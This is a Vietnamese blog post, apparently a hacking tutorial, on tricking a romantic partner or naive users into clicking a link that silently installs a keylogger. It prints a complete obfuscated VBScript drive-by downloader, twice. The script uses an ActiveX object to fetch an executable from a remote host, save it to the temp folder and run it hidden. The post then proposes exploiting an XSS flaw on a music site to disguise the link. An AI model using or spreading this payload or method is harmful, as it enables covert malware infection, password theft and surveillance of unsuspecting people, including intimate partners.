tut này không có gì là đặc biệt ngoài lừa người yêu or chicken click vào link chứa keylogger của mình , vậy làm sao để cái link ấy nhìn là thấy tin tưởng + 1 chút chém gió là có thể lừa được victim , đa số là gà
thui bắt đầu
1. cài đặt 1 em bé kiếm lấy 1 cái host up em bé đó lên
download em bé
thui bắt đầu
1. cài đặt 1 em bé kiếm lấy 1 cái host up em bé đó lên
download em bé
2.nếu ai có soft mã hóa em bé này lại thì càng tốt
3.dùng script này để chạy em bé lên save lại thành embe.js dùng
<script type="text/javascript" src="embe.js"></script>
<script language="VBScript">
on error resume next
dl = "http://site.com/embe.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="vnhack.us"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
on error resume next
dl = "http://site.com/embe.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="vnhack.us"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
4. bước cuối mới là bước quan trọng nè
hùi trước thấy mp3.zing.vn bị lỗi xss nên mình vào thử xem thế nào
gửu link nhạc này cho người yêu , chắc chắn người yêu sẽ ko bao giờ nghi ngờ đó là virus
lợi dụng lỗi này mình cho chạy về site gắn em bé của mình hehe
5.
http://ha.ckers.org/xss.html
<-- một ít về xss cho mọi người tham khảo , chịu khó tư duy và suy nghĩ
Nguồn: http://kingit.info/@/tut-hack-pass-yahoo-nguoi-yeu/#ixzz1zWk7l2oS
No comments:
Post a Comment